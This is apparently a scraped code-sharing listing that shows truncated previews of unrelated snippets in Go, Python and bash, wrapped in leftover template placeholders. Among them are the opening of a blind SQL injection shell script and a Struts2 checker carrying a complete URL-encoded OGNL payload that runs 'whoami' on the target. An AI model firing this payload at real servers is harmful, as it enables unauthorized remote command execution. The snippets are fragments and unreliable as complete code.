参考自ghostchina
<div class="demo">
<h1>{{name}}</h1>
{{content.title}}
#!/usr/bin/env python | |
''' | |
Blind SQL injection Python shell | |
BSIShell is a simple python script that permits blind SQL injection. | |
by Rodrigo Marcos | |
''' |
package main | |
import ( | |
"bytes" | |
"crypto/aes" | |
"crypto/cipher" | |
"crypto/rand" | |
"encoding/base64" | |
"encoding/hex" | |
"io" |
package main | |
import ( | |
"encoding/binary" | |
"errors" | |
"fmt" | |
"strconv" | |
"strings" | |
"sync" | |
"syscall" |
#!/bin/bash | |
#显示菜单(单选) | |
display_menu(){ | |
local soft=$1 | |
local prompt="which ${soft} you'd select: " | |
eval local arr=(\${${soft}_arr[@]}) | |
while true | |
do | |
echo -e "#################### ${soft} setting ####################\n\n" |
package main | |
import ( | |
"fmt" | |
) | |
func main() { | |
fmt.Println("Hello") | |
testpanics() | |
fmt.Println("World") |
# coding=utf-8 | |
import os | |
import csv | |
import smtplib | |
from email.header import Header as _Header | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
from email.utils import parseaddr, formataddr | |
from mako.template import Template |
import string | |
import random | |
import redis | |
r = redis.StrictRedis(host='localhost',port=6379,db=0) | |
GAME_BOARD_KEY = 'game.board' | |
# 插入100条随机用户名和分数组成的记录,zadd方法表示操作的是有序列表 | |
for i in range(1000): |
#! /usr/bin/env python | |
# encoding:utf-8 | |
import urllib2 | |
import sys | |
from poster.encode import multipart_encode | |
from poster.streaminghttp import register_openers | |
def poc(): |
#!/usr/bin/env python | |
import urllib | |
import urllib2 | |
import re | |
import sys | |
url_exp = "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}" | |
def judge(url): | |
#判断是否存在该漏洞 | |
try: | |
url = url + url_exp |
参考自ghostchina
<div class="demo">
<h1>{{name}}</h1>
{{content.title}}